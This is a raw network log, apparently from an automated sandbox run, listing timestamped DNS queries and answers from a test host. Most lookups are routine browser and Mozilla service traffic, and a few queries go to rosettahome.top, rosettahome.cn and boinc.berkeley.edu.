                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.469376087 CET53522351.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.470671892 CET5970953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.477456093 CET53597091.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.478105068 CET5624053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.485651970 CET53562401.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.465959072 CET5830253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.489919901 CET53578981.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.492458105 CET6454353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.500164032 CET53645431.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.501178980 CET6115753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.507937908 CET53611571.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.509174109 CET5445653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.516114950 CET53544561.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.606731892 CET5965253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.613336086 CET53596521.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.613954067 CET5657953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.621319056 CET53565791.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.293251991 CET53546041.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.925563097 CET6516453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.932233095 CET53651641.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.943237066 CET5277753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.950455904 CET53527771.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.276978016 CET5918253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.277035952 CET6423353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284008026 CET53591821.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284116030 CET53642331.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284805059 CET6456753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.291619062 CET53645671.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.218256950 CET5764353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.225110054 CET53576431.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.443720102 CET5517853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.450993061 CET53551781.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.242422104 CET6413553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.249341011 CET53641351.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.531899929 CET5811953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.538676977 CET53581191.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.540677071 CET6441653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.547571898 CET53644161.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.853272915 CET4944853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.859751940 CET53494481.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.843679905 CET5566653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.851012945 CET53556661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.856278896 CET5230053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.864490032 CET53523001.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.865125895 CET5152653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.873226881 CET53515261.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.490956068 CET5729353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.498796940 CET53572931.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.500124931 CET6462253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.507292032 CET53646221.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.508037090 CET5629953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.516057014 CET53562991.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:46.032723904 CET53581451.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:48.561793089 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:04.645312071 CET5917053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:04.652199030 CET53591701.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.500736952 CET5396053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:09.012140989 CET53626001.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:09.170028925 CET53654171.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:12.107455015 CET5627453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:12.114226103 CET53562741.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:28.537883997 CET53548801.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.457077026 CET4997453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.457077026 CET5406653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.491008043 CET53499741.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.620379925 CET53540661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.025022030 CET6386853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.235383034 CET53638681.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.502249002 CET6489753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.510011911 CET53648971.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.510947943 CET5871353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.518312931 CET53587131.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.992990971 CET5256353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:15.336714029 CET53499461.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:30.426593065 CET5941453192.168.2.161.1.1.1

                                                                                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:09.238671064 CET192.168.2.161.1.1.10x3402Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:09.238821030 CET192.168.2.161.1.1.10x3494Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:11.209774971 CET192.168.2.161.1.1.10xd05Standard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:11.219183922 CET192.168.2.161.1.1.10xc67bStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:12.764555931 CET192.168.2.161.1.1.10x315dStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:12.764707088 CET192.168.2.161.1.1.10x1430Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.578043938 CET192.168.2.161.1.1.10x7d52Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.587560892 CET192.168.2.161.1.1.10x468bStandard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.599936962 CET192.168.2.161.1.1.10xd369Standard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.800411940 CET192.168.2.161.1.1.10x4d20Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.800539017 CET192.168.2.161.1.1.10xa0d9Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:14.674751997 CET192.168.2.161.1.1.10xd020Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:14.696614027 CET192.168.2.161.1.1.10xc77dStandard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.851919889 CET192.168.2.161.1.1.10xa5dStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.856959105 CET192.168.2.161.1.1.10x1892Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.860445023 CET192.168.2.161.1.1.10x9dadStandard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.860466003 CET192.168.2.161.1.1.10x6dbfStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.863210917 CET192.168.2.161.1.1.10xa45dStandard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867820024 CET192.168.2.161.1.1.10x2cb6Standard query (0)youtube-ui.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.868436098 CET192.168.2.161.1.1.10x4f2eStandard query (0)star-mini.c10r.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.872390032 CET192.168.2.161.1.1.10xe1caStandard query (0)dyna.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.875371933 CET192.168.2.161.1.1.10x428fStandard query (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.875881910 CET192.168.2.161.1.1.10xd4acStandard query (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.876738071 CET192.168.2.161.1.1.10xcb86Standard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.879842043 CET192.168.2.161.1.1.10x5a2cStandard query (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882853031 CET192.168.2.161.1.1.10xf7bfStandard query (0)www.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.883389950 CET192.168.2.161.1.1.10xd56aStandard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.890547991 CET192.168.2.161.1.1.10x199dStandard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.890981913 CET192.168.2.161.1.1.10x81eStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.890983105 CET192.168.2.161.1.1.10x1531Standard query (0)dualstack.reddit.map.fastly.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897942066 CET192.168.2.161.1.1.10xd4e0Standard query (0)twitter.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898685932 CET192.168.2.161.1.1.10x3730Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.899245024 CET192.168.2.161.1.1.10x7eStandard query (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906407118 CET192.168.2.161.1.1.10xbb5eStandard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906821012 CET192.168.2.161.1.1.10x3f87Standard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.917057037 CET192.168.2.161.1.1.10x3debStandard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.917505026 CET192.168.2.161.1.1.10xcf0dStandard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.960206032 CET192.168.2.161.1.1.10x6f5Standard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.970392942 CET192.168.2.161.1.1.10xe034Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.978754044 CET192.168.2.161.1.1.10xa7e7Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.462337971 CET192.168.2.161.1.1.10x7339Standard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.470671892 CET192.168.2.161.1.1.10x2c48Standard query (0)prod.remote-settings.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.478105068 CET192.168.2.161.1.1.10xf8b1Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.465959072 CET192.168.2.161.1.1.10x5639Standard query (0)shavar.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.492458105 CET192.168.2.161.1.1.10xcd10Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.501178980 CET192.168.2.161.1.1.10x13e9Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.509174109 CET192.168.2.161.1.1.10x3114Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.606731892 CET192.168.2.161.1.1.10x1a3cStandard query (0)telemetry-incoming.r53-2.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.613954067 CET192.168.2.161.1.1.10xf198Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.925563097 CET192.168.2.161.1.1.10x4276Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.943237066 CET192.168.2.161.1.1.10x18a8Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.276978016 CET192.168.2.161.1.1.10x3f10Standard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.277035952 CET192.168.2.161.1.1.10xc83fStandard query (0)prod.remote-settings.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284805059 CET192.168.2.161.1.1.10xc086Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.218256950 CET192.168.2.161.1.1.10x5371Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.443720102 CET192.168.2.161.1.1.10x9f0aStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.242422104 CET192.168.2.161.1.1.10xf49eStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.531899929 CET192.168.2.161.1.1.10xed7Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.540677071 CET192.168.2.161.1.1.10x4706Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.853272915 CET192.168.2.161.1.1.10x264Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.843679905 CET192.168.2.161.1.1.10x8bb1Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.856278896 CET192.168.2.161.1.1.10x7231Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.865125895 CET192.168.2.161.1.1.10xb549Standard query (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.490956068 CET192.168.2.161.1.1.10x1df8Standard query (0)normandy.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.500124931 CET192.168.2.161.1.1.10x48a8Standard query (0)normandy-cdn.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.508037090 CET192.168.2.161.1.1.10xe8f2Standard query (0)normandy-cdn.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:04.645312071 CET192.168.2.161.1.1.10x24d9Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.500736952 CET192.168.2.161.1.1.10xf7b4Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:12.107455015 CET192.168.2.161.1.1.10x744fStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.457077026 CET192.168.2.161.1.1.10x77c7Standard query (0)rosettahome.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.457077026 CET192.168.2.161.1.1.10x307fStandard query (0)boinc.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.025022030 CET192.168.2.161.1.1.10xff60Standard query (0)rosettahome.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.502249002 CET192.168.2.161.1.1.10xca28Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.510947943 CET192.168.2.161.1.1.10xb8b9Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.992990971 CET192.168.2.161.1.1.10x1919Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:30.426593065 CET192.168.2.161.1.1.10x61fbStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:09.246246099 CET1.1.1.1192.168.2.160x3402No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:09.250226974 CET1.1.1.1192.168.2.160x3494No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:11.200423956 CET1.1.1.1192.168.2.160x1ffeNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:11.216784954 CET1.1.1.1192.168.2.160xd05No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:12.771326065 CET1.1.1.1192.168.2.160x315dNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:12.771326065 CET1.1.1.1192.168.2.160x315dNo error (0)plus.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:12.773293972 CET1.1.1.1192.168.2.160x1430No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.586234093 CET1.1.1.1192.168.2.160x7d52No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.586234093 CET1.1.1.1192.168.2.160x7d52No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.598220110 CET1.1.1.1192.168.2.160x468bNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.606936932 CET1.1.1.1192.168.2.160xd369No error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.807415962 CET1.1.1.1192.168.2.160x4d20No error (0)play.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:14.682317019 CET1.1.1.1192.168.2.160xd020No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:14.705595016 CET1.1.1.1192.168.2.160xc77dNo error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:14.705595016 CET1.1.1.1192.168.2.160xc77dNo error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.858649015 CET1.1.1.1192.168.2.160xa5dNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.863878965 CET1.1.1.1192.168.2.160x1892No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.863878965 CET1.1.1.1192.168.2.160x1892No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
